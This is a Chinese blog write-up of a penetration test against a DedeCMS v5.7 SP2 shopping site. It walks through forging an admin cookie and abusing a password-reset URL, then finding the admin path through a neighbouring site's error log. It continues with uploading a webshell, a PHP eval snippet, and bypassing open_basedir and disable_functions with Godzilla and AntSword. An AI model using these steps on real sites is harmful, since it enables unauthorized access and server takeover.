一次旁站信息泄露的dedecms站点渗透

待我称王封你为后i 2022-12-24 04:50 223阅读 0赞

今天又是准备划水认真工作的一天，没想到一到公司领导就甩了个站过来，这可能就是打工人吧  
话不多说来看看站，先信息收集一波

# 初步测试目标站点 #

打开进去是一个类似购物商城的地方，没有什么特殊的点，想要操作基本都要进行登录，中间件是nginx  
再看看插件，惊喜来了，是dedecms

![cf01adc4b7e7222c031d95d99e12bb27.png][]

先直接盲打一波后台地址/dede 直接404......

![0d8efefd85b1f3690110cfd54e7093d5.png][]

再看看好歹有前台，先注册个用户

![3c52e228340f8e5efb5c5e6ad3e340e1.png][]

再查看最后更新时间

![29e28e81640fbb885d2eb845f00e41ad.png][]

可以知道是dedecms v5.7 sp2的版本  
这个版本之后有前台管理员密码重置漏洞和任意密码重置漏洞，可以试一下组合拳

1.先注册个00001账户，因为00001经过intval()后值为1(用来登录admin)

2.再访问/member/index.php?uid=00001的用户界面，获取响应包的last\_vid\_\_ckMd5值

![546dc795525fa669ddd71285cc272397.png][]

3.访问/member/,替换DedeUserID为0001,DedeUserID\_\_ckMd5的值为刚才的last\_vid\_\_ckMd5的值。

这时候就发现已经登录了admin的账户

![8baec9149ed60dbed0dc713163f07eaf.png][]

再将这个修改操作放到浏览器上，修改浏览器的cookie，成功在网页上登录

![bdb22199d0a3b01d21520d5bcaa4d886.png][]

这时候再配合dedecms最新版任意用户密码重置漏洞修改管理员密码

先点击下面连接请求key

http://X.X.X.X/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=1  
点击之后，一闪而过的稍后跳转到修改页

马上就变成非法提交。。。

![053a8951d71e14a6f223b529c26f1cc2.png][]

再用开始的链接去访问

![e43bab9211b1bb2fbf040342e94de6d5.png][]

但开始有请求成功的跳转链接，应该还是成功生成了key，再看看浏览记录，返回第一次的页面，再用我的黄金右手快速点击立即跳转，成功进入重置界面。

![4cbd48f98f8512784738177fc7043a91.png][]

这里稍微提一下，这里重置完密码之后还要在前台的账户设置里再此修改密码，因为这个前台修改任意用户密码的洞只能改dede\_member表里的用户信息，而管理员信息存在另一个表dede\_admin中，所以要从前台登录管理员账户并修改dede\_admin表里的密码，才是真正修改了管理员密码。

现在管理员账户密码都有了，就差老大难问题，找后台。

网上有些5.7 sp2的前台getshell，但都是伪前台，在sp1之后还是需要后台地址才能getshell  
网上有大佬写的爆后台脚本，但只在windwos上能用，现在目标是Linux的系统

# 旁站数据库报错文件找出后台 #

经过一番查询，发现dedecms的data下有个mysqli\_error\_trace.inc文件，此文件记录mysql查询错误,如果有后台查询出现错误则会暴露后台路径。但是主站的报错都是plus目录下的

![2d71fee81b930ac25eaf45b92a5d1be4.png][]

通过前期的信息收集找到该网站的真实ip，发现是华为云

![99c3c9b0d003cc7b4e142f7fe1624f9a.png][]

一般这种站只要有旁站大概率可能也有使用了dedecms的站

通过ip反查域名，发现其旁站大多数都是同类型的公司站点

当时我用的云悉，结果只查出来一个.......这个站还不是dede(打脸打脸)

![c48f6860a32d903cac19546986d7f4c9.png][]

又在fofa上查,结果有一堆旁站,随便挑了一个域名直接把数据库报错文件的路径拼接上去,果然出现了一个没见过的路径

拼接这个路径到主站域名访问，成功找到后台

![5ab31806df0c99a1ac0fbfc590994d51.png][]

然后用之前拿到的管理员登陆后台->上传一句话->连接一气呵成

# bypass disable\_function #

准备执行命令验证，发现函数都被禁用了

![5e8b85766f14d61d412b54be041ff605.png][]

disable_functions : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

而且还有open\_basedir限制了目录访问

![3628bbaf09fb6ef8a401e4e7b34d452f.png][]

为了方便绕过disable\_function，先bypass open\_basedir  
可以使用代码

<?php
    echo 'open_basedir: '.ini_get('open_basedir').'<br>';
    echo 'GET: '.$_GET['c'].'<br>';
    eval($_GET['c']);
    echo 'open_basedir: '.ini_get('open_basedir');
    ?>

但是哥斯拉内置了bypass open\_basedir的插件，就直接上哥斯拉了。连上之后发现还是有挺多网站的。

![d6a91f1445031be8bb61c6ae74e981cb.png][]

再把哥斯拉内置的bypassdisable\_functions模块都试了一遍,都失败了。  
再看看当前收集到的信息，服务器是Linux的,服务器中的PHP是用FPM/FastCGI的连接模式启动，当前目录可写

![a98ade98d0009c09ba1cc490dc6421e6.png][]

想到应该可以用PHP-FPM绕过disable\_functions，在蚁剑中已经添加了这个bypass插件  
先去插件市场下载安装绕过disable\_functions插件，然后加载进来，选择PHP-FPM/FastCGI模式进行，FPM地址就用哥斯拉一顿乱找，Linux下可以看看/tmp目录。

![ec5c0088f7791b13719efe954494b4b4.png][]

注意这里的tmp前一定要加/

![896fab8b31b877a400214bcacf6f682f.png][]

操作成功后，会显示成功上传代理脚本和一个so文件，在webshell目录下会多了个.antproxy.php文件，我们直接右键创建副本改地址为该代理PHP文件，再连接即可成功Bypass disable\_functions：

![f24f640100bb18a6eb42eae2f3e2f769.png][]

# 提权 #

在浏览文件时发现存在phpmyadmin目录,前期信息收集得知该站点使用了宝塔,宝塔一般默认把phpmyadmin搭建在888端口上面，但是该网站并没有开启888端口，而且bypass后的shell总是两分钟就掉，有宝塔，又是hvv害怕把服务器提崩....所以就暂时渗透到这里吧。

# 总结： #

在渗透过程中如果主站和旁站是一个类型的站点，那他们的目录结构也很可能相似，很多漏洞点也可能通用。

本文知识点:

1.通过dedecms最新版漏洞组合拳拿到管理员密码。

2.旁站信息收集

3.绕过disable\_functions禁用函数

4.绕过open\_basedir目录限制

[cf01adc4b7e7222c031d95d99e12bb27.png]: /images/20221120/ef4a60d44aeb40feac37e3b679189aaf.png
[0d8efefd85b1f3690110cfd54e7093d5.png]: https://img-blog.csdnimg.cn/img_convert/0d8efefd85b1f3690110cfd54e7093d5.png
[3c52e228340f8e5efb5c5e6ad3e340e1.png]: https://img-blog.csdnimg.cn/img_convert/3c52e228340f8e5efb5c5e6ad3e340e1.png
[29e28e81640fbb885d2eb845f00e41ad.png]: https://img-blog.csdnimg.cn/img_convert/29e28e81640fbb885d2eb845f00e41ad.png
[546dc795525fa669ddd71285cc272397.png]: https://img-blog.csdnimg.cn/img_convert/546dc795525fa669ddd71285cc272397.png
[8baec9149ed60dbed0dc713163f07eaf.png]: https://img-blog.csdnimg.cn/img_convert/8baec9149ed60dbed0dc713163f07eaf.png
[bdb22199d0a3b01d21520d5bcaa4d886.png]: https://img-blog.csdnimg.cn/img_convert/bdb22199d0a3b01d21520d5bcaa4d886.png
[053a8951d71e14a6f223b529c26f1cc2.png]: https://img-blog.csdnimg.cn/img_convert/053a8951d71e14a6f223b529c26f1cc2.png
[e43bab9211b1bb2fbf040342e94de6d5.png]: https://img-blog.csdnimg.cn/img_convert/e43bab9211b1bb2fbf040342e94de6d5.png
[4cbd48f98f8512784738177fc7043a91.png]: https://img-blog.csdnimg.cn/img_convert/4cbd48f98f8512784738177fc7043a91.png
[2d71fee81b930ac25eaf45b92a5d1be4.png]: https://img-blog.csdnimg.cn/img_convert/2d71fee81b930ac25eaf45b92a5d1be4.png
[99c3c9b0d003cc7b4e142f7fe1624f9a.png]: https://img-blog.csdnimg.cn/img_convert/99c3c9b0d003cc7b4e142f7fe1624f9a.png
[c48f6860a32d903cac19546986d7f4c9.png]: https://img-blog.csdnimg.cn/img_convert/c48f6860a32d903cac19546986d7f4c9.png
[5ab31806df0c99a1ac0fbfc590994d51.png]: https://img-blog.csdnimg.cn/img_convert/5ab31806df0c99a1ac0fbfc590994d51.png
[5e8b85766f14d61d412b54be041ff605.png]: https://img-blog.csdnimg.cn/img_convert/5e8b85766f14d61d412b54be041ff605.png
[3628bbaf09fb6ef8a401e4e7b34d452f.png]: https://img-blog.csdnimg.cn/img_convert/3628bbaf09fb6ef8a401e4e7b34d452f.png
[d6a91f1445031be8bb61c6ae74e981cb.png]: https://img-blog.csdnimg.cn/img_convert/d6a91f1445031be8bb61c6ae74e981cb.png
[a98ade98d0009c09ba1cc490dc6421e6.png]: https://img-blog.csdnimg.cn/img_convert/a98ade98d0009c09ba1cc490dc6421e6.png
[ec5c0088f7791b13719efe954494b4b4.png]: https://img-blog.csdnimg.cn/img_convert/ec5c0088f7791b13719efe954494b4b4.png
[896fab8b31b877a400214bcacf6f682f.png]: https://img-blog.csdnimg.cn/img_convert/896fab8b31b877a400214bcacf6f682f.png
[f24f640100bb18a6eb42eae2f3e2f769.png]: https://img-blog.csdnimg.cn/img_convert/f24f640100bb18a6eb42eae2f3e2f769.png